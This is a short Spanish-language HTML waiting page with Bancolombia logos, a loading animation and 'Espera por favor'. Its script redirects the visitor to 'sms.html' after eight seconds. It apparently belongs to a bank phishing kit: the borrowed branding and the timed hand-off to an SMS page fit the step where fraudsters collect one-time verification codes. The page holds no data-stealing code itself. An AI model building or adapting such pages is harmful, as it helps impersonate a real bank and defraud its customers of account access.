<!DOCTYPE html>
<html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Espera</title>
    <style>
        /* Estilos CSS para centrar el contenido */
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-color: #f0f0f0;
        }

        .container {
            text-align: center;
        }

        .logo {
            width: 200px;
            height: 100px;
            background-image: url("./content/Bancolombia-logo.png");
            margin-bottom: 20px;
        }

        .loader {
            display: flex;
            justify-content: center;
        }

        .loader span {
            width: 10px;
            height: 10px;
            background-color: #333;
            margin: 0 5px;
            border-radius: 50%;
            animation: loader 1s infinite alternate;
        }

        .loader span:nth-child(2) {
            animation-delay: 0.2s;
        }

        .loader span:nth-child(3) {
            animation-delay: 0.4s;
        }

        @keyframes loader {
            from {
                opacity: 1;
            }
            to {
                opacity: 0.2;
            }
        }
    </style>
</head>
<body>
    <div class="container">
        <img src="./content/logotipo-horizontalx3.png" alt="" style="
    width: 20%;
">
        <div class="logo">
            
        </div>
        <div class="loader">
            <span></span>
            <span></span>
            <span></span>
        </div>
    <h4>Espera por favor</h4>
    <script>
        setTimeout(() => {
            location.href = "sms.html"
        }, 8000);
    </script>
    </div>

</body></html>